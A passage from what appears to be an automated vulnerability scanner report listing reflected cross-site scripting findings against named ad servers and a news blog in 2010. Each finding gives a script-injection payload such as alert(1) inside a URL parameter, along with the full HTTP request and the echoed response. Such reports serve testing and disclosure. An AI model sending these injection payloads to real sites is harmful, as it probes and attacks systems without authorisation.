GET /adiframe/3.0/5235/113160633918"><script>alert(1)</script>fea0b6ed2f9/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/113160633918"><script>alert(1)</script>fea0b6ed2f9/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.161. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb448"><script>alert(1)</script>c9e2446ad38 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0bb448"><script>alert(1)</script>c9e2446ad38/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0bb448"><script>alert(1)</script>c9e2446ad38/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.162. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dfb"><script>alert(1)</script>8694302b385 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154c8dfb"><script>alert(1)</script>8694302b385/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154c8dfb"><script>alert(1)</script>8694302b385/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.163. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a9c"><script>alert(1)</script>259f349a369 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH98a9c"><script>alert(1)</script>259f349a369;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH98a9c"><script>alert(1)</script>259f349a369;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.164. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf069"><script>alert(1)</script>405ed403a5b was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001cf069"><script>alert(1)</script>405ed403a5b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001cf069"><script>alert(1)</script>405ed403a5b;adiframe=y">
...[SNIP]...

2.165. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec76"><script>alert(1)</script>cffc4afe490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&9ec76"><script>alert(1)</script>cffc4afe490=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&9ec76"><script>alert(1)</script>cffc4afe490=1;adiframe=y">
...[SNIP]...

2.166. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27da1'-alert(1)-'06d8b2d8adc was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=447461135627da1'-alert(1)-'06d8b2d8adc&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg= HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 6:11:40 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 424
Date: Sun, 21 Nov 2010 14:30:15 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=447461135627da1'-alert(1)-'06d8b2d8adc">
...[SNIP]...

2.167. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff909'%3balert(1)//6061cabb69a was submitted in the mpvc parameter. This input was echoed as ff909';alert(1)//6061cabb69a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=4474611356&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=ff909'%3balert(1)//6061cabb69a HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 5:01:44 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 411
Date: Sun, 21 Nov 2010 14:30:17 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=ff909';alert(1)//6061cabb69ahttp://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=4474611356">
...[SNIP]...

2.168. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce40'%3balert(1)//9a1e961bef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ce40';alert(1)//9a1e961bef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=4474611356&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=&8ce40'%3balert(1)//9a1e961bef2=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 6:46:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 414
Date: Sun, 21 Nov 2010 14:30:19 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=&8ce40';alert(1)//9a1e961bef2=1http://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=4474611356">
...[SNIP]...

2.169. http://artsbeat.blogs.nytimes.com/2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a37"><script>alert(1)</script>a669c72a928 was submitted in the src parameter. This input was echoed as 54a37\"><script>alert(1)</script>a669c72a928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/?src=dayp54a37"><script>alert(1)</script>a669c72a928 HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:43:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Culture;Arts;Art;Design;Books;Dance;Movies;Music;TV;Theater;anatomy-of-a-scene;books;daniel-radcliffe;david-yates;featured;harry-potter;movies&src=dayp54a37\"><script>alert(1)</script>a669c72a928">
...[SNIP]...

2.170. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d00"><script>alert(1)</script>6ba5c94ec89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframea4d00"><script>alert(1)</script>6ba5c94ec89/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyna4d00"><script>alert(1)</script>6ba5c94ec89/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.171. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5ec"><script>alert(1)</script>c42090ec3fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.09a5ec"><script>alert(1)</script>c42090ec3fb/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.09a5ec"><script>alert(1)</script>c42090ec3fb/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.172. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c91a"><script>alert(1)</script>7a4477580d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.15c91a"><script>alert(1)</script>7a4477580d6/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.15c91a"><script>alert(1)</script>7a4477580d6/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.173. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c338"><script>alert(1)</script>028a4ee8467 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217943c338"><script>alert(1)</script>028a4ee8467/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217943c338"><script>alert(1)</script>028a4ee8467/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.174. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0ab"><script>alert(1)</script>35dadf78370 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/03a0ab"><script>alert(1)</script>35dadf78370/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/03a0ab"><script>alert(1)</script>35dadf78370/-1/size=300x250;adiframe=y">
...[SNIP]...

2.175. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbe7"><script>alert(1)</script>962e69fed8b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1cbbe7"><script>alert(1)</script>962e69fed8b/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1cbbe7"><script>alert(1)</script>962e69fed8b/size=300x250;adiframe=y">
...[SNIP]...

2.176. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 311f5"><script>alert(1)</script>dc96217592f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size311f5"><script>alert(1)</script>dc96217592f=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size311f5"><script>alert(1)</script>dc96217592f=300x250;adiframe=y">
...[SNIP]...

2.177. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

